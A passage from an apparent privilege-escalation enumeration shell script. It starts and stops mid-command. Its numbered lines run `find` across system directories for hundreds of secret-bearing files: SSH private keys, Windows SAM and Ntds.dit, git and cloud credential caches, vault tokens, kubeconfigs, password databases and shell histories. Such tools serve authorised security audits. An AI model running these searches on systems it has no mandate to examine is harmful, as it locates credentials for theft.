-name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    783   FIND_SYS=`eval_bckgrd "find ${ROOT_FOLDER}sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    784   FIND_SYSTEM=`eval_bckgrd "find ${ROOT_FOLDER}system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    785   FIND_SYSTEMD=`eval_bckgrd "find ${ROOT_FOLDER}systemd -name \"rocketchat.service\" -o -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    786   FIND_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp -name \"*.timer\" -o -name \"ssh-agent.sock\" -o -name \"password*.ibd\" -o -name \".boto\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"sess_*\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"agent.*\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    787   FIND_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"ssh*config\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    788   FIND_VAR=`eval_bckgrd "find ${ROOT_FOLDER}var -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"sess_*\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name 